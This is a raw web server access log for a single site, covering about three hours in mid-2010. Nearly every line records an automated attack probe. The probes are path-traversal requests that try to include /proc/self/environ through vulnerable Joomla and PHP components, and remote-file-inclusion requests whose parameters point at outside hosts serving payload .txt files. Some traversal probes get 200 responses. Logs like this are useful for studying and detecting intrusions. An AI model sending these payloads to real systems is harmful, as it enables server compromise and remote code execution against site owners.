203.147.62.92 - - [30/Jun/2010:22:14:59 -0700] "GET /index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:15:39 -0700] "GET /logs//index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:15:40 -0700] "GET /index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:16:09 -0700] "GET /logs//index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:16:09 -0700] "GET /index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:16:13 -0700] "GET /logs//index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:16:13 -0700] "GET /index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:16:49 -0700] "GET /logs//index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:16:50 -0700] "GET /index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:21:20 -0700] "GET /logs//index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
203.147.62.92 - - [30/Jun/2010:22:21:20 -0700] "GET /index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
201.38.203.3 - - [30/Jun/2010:22:22:16 -0700] "GET /index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=http://www.foroptimalhealth.com/modules/dtree/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
201.38.203.3 - - [30/Jun/2010:22:22:16 -0700] "GET /logs//index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=http://www.foroptimalhealth.com/modules/dtree/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
201.38.203.3 - - [30/Jun/2010:22:22:16 -0700] "GET /logs/access.log//index.php?option=com_rwcards&view=rwcards&Itemid=4//index.php?option=com_rwcards&controller=http://www.foroptimalhealth.com/modules/dtree/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [30/Jun/2010:22:26:43 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [30/Jun/2010:22:26:43 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [30/Jun/2010:22:26:43 -0700] "GET /logs/access_100531.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [30/Jun/2010:22:28:12 -0700] "GET /logs/access_100601.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [30/Jun/2010:22:28:12 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [30/Jun/2010:22:28:12 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:22:47:50 -0700] "GET /logs/access_100501.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:22:47:50 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:22:47:50 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:22:47:51 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:22:47:51 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:22:47:51 -0700] "GET /logs/access_100501.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:22:47:53 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:22:47:53 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:22:47:53 -0700] "GET /logs/access_100501.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.144.106 - - [30/Jun/2010:22:55:41 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
110.45.144.106 - - [30/Jun/2010:22:55:47 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
94.23.215.207 - - [30/Jun/2010:22:56:07 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.23.215.207 - - [30/Jun/2010:22:56:07 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.23.215.207 - - [30/Jun/2010:22:56:07 -0700] "GET /logs/access_100601.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.19.116.186 - - [30/Jun/2010:22:58:29 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.19.116.186 - - [30/Jun/2010:22:58:29 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.19.116.186 - - [30/Jun/2010:22:58:30 -0700] "GET /logs/access_100601.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:01:41 -0700] "GET /logs//index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:01:41 -0700] "GET /index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:02:30 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:02:30 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:03:50 -0700] "GET /index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:04:24 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:04:26 -0700] "GET /logs/access_100601.log//index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:04:27 -0700] "GET /index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:04:27 -0700] "GET /logs//index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
72.29.71.195 - - [30/Jun/2010:23:04:27 -0700] "GET /logs/access_100601.log//index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
72.29.71.195 - - [30/Jun/2010:23:04:28 -0700] "GET /index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
72.29.71.195 - - [30/Jun/2010:23:04:28 -0700] "GET /logs//index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
72.29.71.195 - - [30/Jun/2010:23:04:43 -0700] "GET /logs/access_100601.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
72.29.71.195 - - [30/Jun/2010:23:04:43 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.de-construction.com"
72.29.71.195 - - [30/Jun/2010:23:04:43 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.810" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:05:01 -0700] "GET /logs/access_100601.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:05:01 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:05:02 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:05:24 -0700] "GET /logs//index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:05:25 -0700] "GET /index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.191.139.210 - - [30/Jun/2010:23:05:25 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [30/Jun/2010:23:05:25 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [30/Jun/2010:23:05:25 -0700] "GET /logs/access_100601.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:05:32 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [30/Jun/2010:23:05:33 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.de-construction.com"
72.29.71.195 - - [30/Jun/2010:23:05:50 -0700] "GET /index?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
72.29.71.195 - - [30/Jun/2010:23:05:52 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.de-construction.com"
94.23.215.207 - - [30/Jun/2010:23:06:10 -0700] "GET /logs/access_100601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.23.215.207 - - [30/Jun/2010:23:07:20 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
87.238.172.21 - - [30/Jun/2010:23:08:43 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
87.238.172.21 - - [30/Jun/2010:23:08:43 -0700] "GET /logs/access_100601.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
87.238.172.21 - - [30/Jun/2010:23:08:43 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
87.238.172.21 - - [30/Jun/2010:23:14:40 -0700] "GET /logs/access_100601.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.19.116.186 - - [30/Jun/2010:23:18:14 -0700] "GET /logs/access_100601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.19.116.186 - - [30/Jun/2010:23:20:22 -0700] "GET /logs/access_100501.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:23:47:27 -0700] "GET /logs/access_100601.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:23:47:27 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:23:47:27 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:23:52:51 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:23:54:42 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:23:56:05 -0700] "GET /logs/access_100531.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [30/Jun/2010:23:57:33 -0700] "GET /logs/access_100601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:00:12:31 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:00:12:31 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:00:12:31 -0700] "GET /logs/access_100601.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:00:13:35 -0700] "GET /logs///skin/uks_gallery_v3010//write.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:00:13:35 -0700] "GET /logs/access_100531.log///skin/uks_gallery_v3010//write.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:00:13:35 -0700] "GET //skin/uks_gallery_v3010//write.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
207.46.204.184 - - [01/Jul/2010:00:14:22 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "de-construction.com"
92.243.84.187 - - [01/Jul/2010:00:16:19 -0700] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 - "www.de-construction.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.de-construction.com"
207.46.204.184 - - [01/Jul/2010:00:33:50 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "de-construction.com"
62.44.82.118 - - [01/Jul/2010:00:41:29 -0700] "GET /logs/?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.803" "www.de-construction.com"
62.44.82.118 - - [01/Jul/2010:00:41:29 -0700] "GET /?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:00:54:57 -0700] "GET /logs/access_100531.log//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:00:54:57 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:00:54:58 -0700] "GET /logs//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1372 "-" "libwww-perl/5.79" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:00:55:05 -0700] "GET /logs/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:00:55:05 -0700] "GET /logs/access_100601.log%20%20/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:00:55:05 -0700] "GET /phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:00:56:35 -0700] "GET /logs//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1372 "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:00:56:39 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:00:58:05 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:01:02:56 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:21:36 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:21:37 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:21:41 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:21:44 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:21:45 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
222.236.47.182 - - [01/Jul/2010:01:21:45 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:01:22:53 -0700] "GET /logs/access_100601.log%20%20/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:01:22:53 -0700] "GET /logs/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:01:22:53 -0700] "GET /errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:01:27:54 -0700] "GET /logs/access.log/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:01:28:42 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:01:28:42 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:01:28:42 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
